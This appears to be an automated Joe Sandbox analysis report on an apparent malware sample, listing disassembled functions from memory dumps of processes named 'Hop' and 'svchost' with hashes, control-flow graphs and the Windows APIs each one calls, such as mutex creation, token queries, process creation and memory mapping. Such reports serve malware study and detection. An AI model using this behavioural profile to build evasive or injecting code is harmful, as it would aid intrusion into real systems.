                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                                          • String ID: NJI@
                                                                                                                                                                                                                                                                                                          • API String ID: 0-1894075864
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction ID: 41900210631ea17dfdacb04b29895e770fa5b114f3a263749fd2a45f84257753
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45665fd503c042bbd1cddf3e76509b083df421fb529cf4e6337dc35805fb2d8
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9EE14A7051C7D48BD775DF2988963EBBBE5EB99702F00492EE4CAC2281EB349501CB87
                                                                                                                                                                                                                                                                                                          Function 00000243665E8234 Relevance: 3.4, APIs: 2, Instructions: 392fileCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 310 243665e8234-243665e8278 call 243665e51bc 314 243665e860f-243665e8622 310->314 315 243665e827e-243665e82b2 call 243665e1f50 call 243665e4f54 call 243665e1f2c 310->315 315->314 322 243665e82b8-243665e82d1 315->322 323 243665e8333-243665e8371 call 243665e64c0 call 243665e1f2c 322->323 324 243665e82d3-243665e82e6 call 243665e1500 322->324 343 243665e8377-243665e84e4 call 243665e1030 * 2 call 243665e1f50 call 243665e940c call 243665e1f50 call 243665e940c call 243665e1f50 call 243665e940c call 243665e1f50 call 243665e940c call 243665e1f50 call 243665e940c call 243665e1f50 call 243665e940c call 243665e1f2c CreateFileMappingW 323->343 344 243665e8606-243665e8607 323->344 330 243665e8308-243665e830d 324->330 331 243665e82e8-243665e82eb 324->331 332 243665e830f-243665e8310 330->332 333 243665e8323-243665e8326 330->333 331->330 335 243665e82ed-243665e82f1 331->335 336 243665e8312-243665e8315 332->336 333->323 337 243665e8328-243665e832c 333->337 335->330 338 243665e82f3-243665e82f5 335->338 336->333 340 243665e8317-243665e8321 336->340 341 243665e832e-243665e8331 337->341 338->330 339 243665e82f7-243665e8306 338->339 339->341 340->333 340->336 341->323 341->324 343->344 377 243665e84ea-243665e8508 MapViewOfFile 343->377 344->314 378 243665e85fd-243665e85fe 377->378 379 243665e850e-243665e856f call 243665e1030 * 3 377->379 378->344 386 243665e8571-243665e8582 call 243665e1030 379->386 387 243665e8587-243665e858f 379->387 386->387 389 243665e8591 387->389 390 243665e8598-243665e85f3 call 243665e1f50 call 243665e9218 387->390 389->390 395 243665e85f8 call 243665e1f2c 390->395 395->378
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: File$CreateMappingView
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3452162329-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c601f1478ab9137d9275349cd9da242e2fbd05faee214597b51a1edf8909ebdf
                                                                                                                                                                                                                                                                                                          • Instruction ID: 856866319025a39f10a297de1c5caa20523739aced0fc6ed0e08d6b92daf6047
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c601f1478ab9137d9275349cd9da242e2fbd05faee214597b51a1edf8909ebdf
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 83C10D30618B095BEF18EF28D88A7EE73D6F7A4740F01462DE55AC3296DF34D9018B89
                                                                                                                                                                                                                                                                                                          Function 00000243665E973C Relevance: 3.1, APIs: 2, Instructions: 117memoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Virtual$ErrorFreeFunctionModeProtectTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3431440644-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c558a3bee63eb8d82cfee7bb6036631f102c00f5edc4b5b2d839b26d2bc08f01
                                                                                                                                                                                                                                                                                                          • Instruction ID: a3241c621d1f433075b2a307eab7c9c6361e4baa0728b119c27723e49aa4b4f6
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c558a3bee63eb8d82cfee7bb6036631f102c00f5edc4b5b2d839b26d2bc08f01
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC31C93020CA4A5BEF54FB29D88ABAD77DAFBB4740F410519F54AC7192DE24DA40CB8D
                                                                                                                                                                                                                                                                                                          Function 00000243665E4888 Relevance: 3.1, APIs: 2, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 449 243665e4888-243665e48a1 451 243665e492f-243665e4937 449->451 452 243665e48a7-243665e48c7 GetTokenInformation 449->452 452->451 453 243665e48c9-243665e48d2 452->453 453->451 455 243665e48d4-243665e48e4 453->455 455->451 457 243665e48e6-243665e4908 GetTokenInformation 455->457 458 243665e490a-243665e4924 457->458 459 243665e4926-243665e4927 457->459 458->459 459->451
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: InformationToken
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4114910276-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0588b5df070fd58e483b9259e8b7792c754254eeb870b8f27a2360e8991485ad
                                                                                                                                                                                                                                                                                                          • Instruction ID: 597f5f621e108e22ed587090f2ad85fa7874142f4ac3597d6ea789a1fea43756
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0588b5df070fd58e483b9259e8b7792c754254eeb870b8f27a2360e8991485ad
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA11B1302086498FDB44EF64E8DDA6AB7E6FB94306F104929E586C3268DF34D944CF46
                                                                                                                                                                                                                                                                                                          Function 00000243665E8C08 Relevance: 1.7, APIs: 1, Instructions: 157processCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 462 243665e8c08-243665e8c94 call 243665e5f90 * 4 472 243665e8d02-243665e8d04 462->472 473 243665e8c96-243665e8ca8 462->473 474 243665e8dab-243665e8dae 472->474 473->472 478 243665e8caa-243665e8cb3 473->478 475 243665e8d09-243665e8d22 474->475 476 243665e8db4-243665e8dd6 call 243665e1f2c call 243665e9990 474->476 486 243665e8da2-243665e8da8 475->486 487 243665e8d24-243665e8d3b 475->487 478->472 480 243665e8cb5-243665e8cf2 CreateProcessW 478->480 483 243665e8cfa-243665e8cfc 480->483 484 243665e8cf4 480->484 483->472 483->476 484->483 486->474 487->486 490 243665e8d3d-243665e8d46 487->490 490->486 491 243665e8d48-243665e8d96 490->491 493 243665e8d9e-243665e8da0 491->493 494 243665e8d98 491->494 493->476 493->486 494->493
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 963392458-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 2cfda130ca864b08787e99a1628f67eedfe46d1a9f14ab55541b67a143a70abc
                                                                                                                                                                                                                                                                                                          • Instruction ID: bc7f90cce08c79c487769aa9793e78d9703b881e82af2fcdcb72bfd4c06214e3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2cfda130ca864b08787e99a1628f67eedfe46d1a9f14ab55541b67a143a70abc
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 23518571604B095FEBA5DF28C44979EB7E6FBA4741F95092EA28AC2150DB34C640CB0E
                                                                                                                                                                                                                                                                                                          Function 00000243665EC54C Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 0ef85e6c49b167f6fa9e03bb0202aec9cadee554545795ea33251ab7e92968d2
                                                                                                                                                                                                                                                                                                          • Instruction ID: 470fcee4dda6280bf6a3876a05fcd9f1ce6784f18537bf8fd90aec42a7b0fa29
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0ef85e6c49b167f6fa9e03bb0202aec9cadee554545795ea33251ab7e92968d2
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B01C820624A095FEB54EB29C44E7BE72DAF764705F50442AE49AC2281EB24CA44CF4A
                                                                                                                                                                                                                                                                                                          Function 00000243665EC3FC Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FunctionTable
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1252446317-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 36ebb8551405ab402fb9baea8a3cc074c161fc2652fbf5a3c18d23fc79acd59a
                                                                                                                                                                                                                                                                                                          • Instruction ID: 73f71b30ab4e39e90701214fe35df3d3b5e7fe5a889cc7fe8eee7fcaa921aab1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36ebb8551405ab402fb9baea8a3cc074c161fc2652fbf5a3c18d23fc79acd59a
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 53E012342115065BEF68D61DC80D3A83AD1E798316FA0426A9940C6291DB79C597CE49
                                                                                                                                                                                                                                                                                                          Function 00000243665EC440 Relevance: 1.4, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: d45755ac3fc1b299357fa248614e5cf9831b05787f0c9c72564af89a9d49d463
                                                                                                                                                                                                                                                                                                          • Instruction ID: cc7727da5ba6b02f52a475cab1a3479b6b67e8f2d369ae936338eba11b42e2e1
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d45755ac3fc1b299357fa248614e5cf9831b05787f0c9c72564af89a9d49d463
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E331E330214A0A4FFF58EF18C499B7637D6FB68742F01416AD84EC32A6DB34D900CB84
                                                                                                                                                                                                                                                                                                          Function 00000243665E3BC8 Relevance: 1.3, APIs: 1, Instructions: 90stringCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000243665E1000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_243665e1000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1586166983-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: c6a7c236d73697e4ca57ed050e55d544e6cacc2476fd745c83e7f6659eda1179
                                                                                                                                                                                                                                                                                                          • Instruction ID: bc57f4716f5cecf6810836e5c9430fce5ae1bdb195898e9478c5862e0b1280bb
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6a7c236d73697e4ca57ed050e55d544e6cacc2476fd745c83e7f6659eda1179
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F921793071490A5FFFA4E778AC5E76A36DBEBA4740F454165910BC21BAEE38CE058B48

                                                                                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                                                                                          Execution Coverage:10.8%
                                                                                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                                                                                          Total number of Nodes:143
                                                                                                                                                                                                                                                                                                          Total number of Limit Nodes:2
                                                                                                                                                                                                                                                                                                          execution_graph 3401 1c276406174 3402 1c2764061a4 3401->3402 3411 1c276401eb8 3402->3411 3404 1c2764061a9 3414 1c276404f54 3404->3414 3406 1c2764061d7 3407 1c276406496 3406->3407 3408 1c276404f54 malloc 3406->3408 3410 1c276406213 3408->3410 3409 1c27640648d free 3409->3407 3410->3407 3410->3409 3418 1c276401b7c 3411->3418 3413 1c276401ecb 3413->3404 3415 1c276404f8c 3414->3415 3417 1c276404fbc 3414->3417 3416 1c276404feb malloc 3415->3416 3415->3417 3416->3417 3417->3406 3419 1c276401b94 3418->3419 3420 1c276401b9c calloc 3419->3420 3421 1c276401bbe 3419->3421 3420->3421 3421->3413 3422 1c276408974 3424 1c2764089ad 3422->3424 3423 1c276408ad4 ExitProcess 3424->3423 3428 1c27640771c 3424->3428 3426 1c2764089ee 3426->3423 3432 1c2764069d8 3426->3432 3429 1c276407792 3428->3429 3430 1c276407bf8 CreateMutexExW 3429->3430 3431 1c2764078ab 3429->3431 3430->3431 3431->3426 3457 1c2764051bc 3432->3457 3434 1c276406a4a 3442 1c2764076dd 3434->3442 3463 1c276405fa0 3434->3463 3436 1c276406b01 3437 1c276406bbd LoadLibraryExW 3436->3437 3438 1c276406bdb 3437->3438 3439 1c276404f54 malloc 3438->3439 3441 1c276406c01 3439->3441 3440 1c276404f54 malloc 3444 1c276406d4c 3440->3444 3441->3440 3442->3423 3443 1c276404f54 malloc 3447 1c27640701b 3443->3447 3445 1c276404f54 malloc 3444->3445 3446 1c276406eb5 3444->3446 3445->3446 3446->3442 3446->3443 3449 1c27640751c 3446->3449 3448 1c27640710a GetTokenInformation 3447->3448 3447->3449 3455 1c276407190 3447->3455 3452 1c276407138 3448->3452 3449->3442 3451 1c2764076a0 VirtualFree 3449->3451 3450 1c276404f54 malloc 3456 1c2764072d5 3450->3456 3451->3442 3453 1c27640716c GetTokenInformation 3452->3453 3452->3455 3453->3455 3454 1c27640750c free 3454->3449 3455->3450 3456->3449 3456->3454 3458 1c2764051f7 3457->3458 3459 1c2764052a9 malloc 3458->3459 3462 1c2764052e6 3458->3462 3460 1c2764052c0 3459->3460 3459->3462 3467 1c2764050cc 3460->3467 3462->3434 3464 1c276405ff3 NtQueryInformationProcess 3463->3464 3466 1c276405fb5 3463->3466 3465 1c276406015 3464->3465 3465->3436 3466->3464 3466->3465 3470 1c2764050f7 3467->3470 3468 1c2764051af 3468->3462 3469 1c2764051a6 free 3469->3468 3470->3468 3470->3469 3471 1c276406024 3472 1c276406167 3471->3472 3473 1c276406046 3471->3473 3474 1c276406152 VirtualFree 3473->3474 3474->3472 3511 1c276405f54 3512 1c2764050cc free 3511->3512 3513 1c276405f7b 3512->3513 3522 1c276408624 3523 1c276408663 3522->3523 3524 1c27640771c CreateMutexExW 3523->3524 3525 1c2764087b6 3523->3525 3526 1c2764087b2 3524->3526 3526->3525 3527 1c2764088ca 3526->3527 3529 1c276408822 3526->3529 3528 1c2764069d8 9 API calls 3527->3528 3528->3525 3531 1c276408234 3529->3531 3532 1c276408262 3531->3532 3533 1c2764051bc 2 API calls 3532->3533 3534 1c276408272 3533->3534 3535 1c276404f54 malloc 3534->3535 3540 1c2764085f8 3534->3540 3537 1c2764082a7 3535->3537 3537->3540 3541 1c2764064c0 3537->3541 3538 1c276408338 3538->3540 3550 1c276409218 3538->3550 3540->3525 3543 1c276406500 3541->3543 3542 1c276406728 3542->3538 3543->3542 3544 1c276405fa0 NtQueryInformationProcess 3543->3544 3545 1c276406573 3544->3545 3547 1c2764066b2 3545->3547 3549 1c2764065f4 3545->3549 3546 1c276405fa0 NtQueryInformationProcess 3546->3547 3547->3542 3547->3546 3548 1c276405fa0 NtQueryInformationProcess 3548->3549 3549->3542 3549->3548 3551 1c27640924e 3550->3551 3552 1c276404f54 malloc 3551->3552 3555 1c27640939f 3551->3555 3553 1c27640926d 3552->3553 3553->3555 3556 1c276408ae0 3553->3556 3555->3540 3558 1c276408b1a 3556->3558 3557 1c276408bea 3557->3555 3558->3557 3559 1c276405fa0 NtQueryInformationProcess 3558->3559 3561 1c276408b79 3559->3561 3560 1c276405fa0 NtQueryInformationProcess 3560->3561 3561->3557 3561->3560 3518 1c276401005 3519 1c2764098b0 3518->3519 3520 1c2764098df 3519->3520 3521 1c27640973c 3 API calls 3519->3521 3521->3520 3475 1c276403bc8 3476 1c276403c02 3475->3476 3477 1c276403bde 3475->3477 3478 1c276403bea lstrcmpiW 3477->3478 3478->3476 3514 1c276406758 3515 1c276406779 3514->3515 3516 1c276401eb8 calloc 3515->3516 3517 1c2764067ae 3515->3517 3516->3517 3483 1c27640973c 3484 1c276409756 3483->3484 3490 1c276409858 3484->3490 3491 1c27640c440 3484->3491 3486 1c2764097cf 3487 1c276401eb8 calloc 3486->3487 3489 1c2764097ef 3487->3489 3488 1c27640982f SetErrorMode 3488->3490 3489->3488 3493 1c27640c457 3491->3493 3492 1c27640c4d0 VirtualFree 3494 1c27640c4e6 3492->3494 3493->3492 3493->3494 3494->3486 3495 1c276404ae0 3496 1c276404b61 3495->3496 3497 1c276404b02 3495->3497 3497->3496 3498 1c276404b54 LoadLibraryA 3497->3498 3498->3496 3499 1c276401000 3500 1c276409878 3499->3500 3501 1c2764098a7 3500->3501 3503 1c27640973c 3500->3503 3504 1c276409756 3503->3504 3505 1c27640c440 VirtualFree 3504->3505 3510 1c276409858 3504->3510 3506 1c2764097cf 3505->3506 3507 1c276401eb8 calloc 3506->3507 3509 1c2764097ef 3507->3509 3508 1c27640982f SetErrorMode 3508->3510 3509->3508 3510->3501

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 00007DF426ABE910 Relevance: 18.1, APIs: 6, Strings: 4, Instructions: 563nativeCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000F.00000003.2230523036.00007DF426A91000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007DF426A91000, based on PE: false
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_15_3_7df426a91000_svchost.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: AcceptConnectPort$DuplicateHandlecallocfree
                                                                                                                                                                                                                                                                                                          • String ID: ,$,$H$H
                                                                                                                                                                                                                                                                                                          • API String ID: 2459737528-3578512806
                                                                                                                                                                                                                                                                                                          • Opcode ID: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3bbd9367d6dde05fbb468c3e11ceb89e262adcb54c10ef9ea1c80552148b96b0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9947afaaa98f1177199e84ab3dbda009d5fccaad9051c9b13383d687201c208
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7602913061CB848BD764EF18D88466FB7E5FBD9350F50493EE18EC3291DA74E9468B82
                                                                                                                                                                                                                                                                                                          Function 000001C2764069D8 Relevance: 13.4, APIs: 5, Strings: 2, Instructions: 1185libraryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 0 1c2764069d8-1c276406a58 call 1c2764051bc 3 1c2764076f7-1c27640771a call 1c276409990 0->3 4 1c276406a5e-1c276406aa9 call 1c276401f50 call 1c276409568 call 1c276401f2c 0->4 14 1c2764076ee-1c2764076ef 4->14 15 1c276406aaf-1c276406b78 call 1c2764098e8 call 1c2764098f4 call 1c276405fa0 call 1c276401f50 call 1c276409568 call 1c276401f50 call 1c276409568 4->15 14->3 31 1c276406b99-1c276406b9e 15->31 32 1c276406b7a-1c276406b93 call 1c276401030 15->32 34 1c276406ba7-1c276406c0c call 1c276401f94 LoadLibraryExW call 1c276401f50 call 1c276404f54 call 1c276401f2c 31->34 35 1c276406ba0 31->35 32->31 46 1c276406c12-1c276406c17 34->46 47 1c276406cb3-1c276406cb6 34->47 35->34 50 1c276406caa-1c276406cab 46->50 51 1c276406c1d-1c276406c22 46->51 48 1c276406d22 47->48 49 1c276406cb8-1c276406cf0 call 1c2764098f4 47->49 54 1c276406d26-1c276406d57 call 1c276401f50 call 1c276404f54 call 1c276401f2c 48->54 62 1c276406cf2-1c276406d01 call 1c276408ecc 49->62 63 1c276406d06-1c276406d20 call 1c276405b00 49->63 50->47 51->50 53 1c276406c28-1c276406c75 call 1c276405b00 call 1c276401030 51->53 75 1c276406c77-1c276406c9a call 1c276401030 53->75 76 1c276406c9c-1c276406ca8 53->76 73 1c276406d5d-1c276406d62 54->73 74 1c276406f1f-1c276406f50 call 1c276401f50 call 1c276409568 call 1c276401f2c 54->74 62->63 63->54 77 1c276406d68-1c276406d6d 73->77 78 1c276406f0b-1c276406f19 73->78 95 1c276406f52-1c276406fa6 call 1c276401030 74->95 96 1c276406fae-1c276406fdf call 1c27640c374 74->96 75->76 76->50 77->78 81 1c276406d73-1c276406dcb call 1c276405b00 call 1c276401030 77->81 78->74 87 1c2764076dd-1c2764076e7 78->87 100 1c276406df2-1c276406e0b call 1c27640c0e4 81->100 101 1c276406dcd-1c276406df0 call 1c276401030 81->101 87->14 95->96 123 1c276406fe5-1c276407026 call 1c276401f50 call 1c276404f54 call 1c276401f2c 96->123 124 1c276407546-1c27640754d 96->124 110 1c276406eed-1c276406f04 call 1c276405b00 100->110 111 1c276406e11-1c276406e2c call 1c27640c1a4 100->111 101->100 110->78 111->110 119 1c276406e32-1c276406e41 111->119 121 1c276406e43-1c276406e46 119->121 122 1c276406e57-1c276406ebb call 1c276405b00 * 4 call 1c276401f50 call 1c276404f54 119->122 121->122 125 1c276406e48-1c276406e4f 121->125 175 1c276406eda-1c276406edd 122->175 176 1c276406ebd-1c276406ed0 122->176 146 1c276407028-1c276407036 123->146 147 1c27640709c-1c2764070a1 123->147 126 1c276407554-1c27640755c 124->126 127 1c27640754f-1c276407550 124->127 125->122 131 1c27640755e-1c276407566 126->131 132 1c27640756f-1c27640757a 126->132 127->126 131->132 132->87 136 1c276407580-1c276407599 call 1c276404de8 132->136 136->87 143 1c27640759f-1c2764075b5 136->143 143->87 156 1c2764075bb-1c276407692 call 1c276401030 * 4 143->156 151 1c276407093-1c276407094 146->151 152 1c276407038 146->152 153 1c2764070a3-1c2764070c6 call 1c276401f50 call 1c276401f2c 147->153 154 1c2764070cb-1c2764070e3 147->154 151->147 157 1c27640703a-1c27640703e 152->157 153->154 166 1c2764070e9-1c276407104 154->166 167 1c27640753c-1c27640753d 154->167 201 1c276407694 156->201 202 1c276407698-1c2764076d5 call 1c2764099b6 VirtualFree 156->202 162 1c27640704a-1c276407052 157->162 163 1c276407040-1c276407045 157->163 162->157 170 1c276407054-1c276407056 162->170 163->162 169 1c276407047 163->169 188 1c276407284-1c276407287 166->188 189 1c27640710a-1c276407136 GetTokenInformation 166->189 167->124 169->162 170->151 173 1c276407058-1c276407067 170->173 187 1c276407072-1c276407082 173->187 175->110 181 1c276406edf-1c276406ee2 175->181 176->175 181->110 186 1c276406ee4-1c276406ee5 181->186 186->110 197 1c276407084 187->197 198 1c276407069-1c27640706b 187->198 192 1c276407289-1c2764072a7 call 1c276406858 188->192 193 1c2764072ab-1c2764072e0 call 1c276401f50 call 1c276404f54 call 1c276401f2c 188->193 194 1c276407147-1c276407157 189->194 195 1c276407138-1c276407141 189->195 192->193 224 1c2764072e6-1c2764072eb 193->224 225 1c27640752b-1c276407530 193->225 210 1c276407274-1c276407282 194->210 213 1c27640715d-1c27640718e call 1c2764098f4 GetTokenInformation 194->213 195->194 195->210 197->151 208 1c276407086-1c276407090 198->208 209 1c27640706d-1c276407070 198->209 201->202 202->87 208->151 209->187 210->188 210->193 222 1c27640719b-1c27640719e 213->222 223 1c276407190-1c276407199 213->223 222->210 226 1c2764071a4-1c27640722f 222->226 223->222 227 1c27640750c-1c27640751a free 224->227 228 1c2764072f1-1c2764072f6 224->228 225->167 234 1c27640726b-1c27640726c 226->234 235 1c276407231-1c27640725e 226->235 227->225 230 1c27640751c-1c276407520 227->230 228->227 231 1c2764072fc-1c276407335 call 1c276405b00 228->231 230->225 231->227 239 1c27640733b-1c276407369 call 1c2764098f4 call 1c276401030 231->239 234->210 235->234 245 1c276407399-1c2764073b5 call 1c27640c0e4 239->245 246 1c27640736b-1c27640736c 239->246 252 1c2764074f6-1c276407502 call 1c276405b00 245->252 253 1c2764073bb-1c2764073d7 call 1c27640c1a4 245->253 248 1c276407371-1c276407393 call 1c276401030 246->248 254 1c276407395-1c276407396 248->254 258 1c276407507-1c276407508 252->258 253->252 259 1c2764073dd-1c27640741c 253->259 254->245 258->227 260 1c276407455-1c276407497 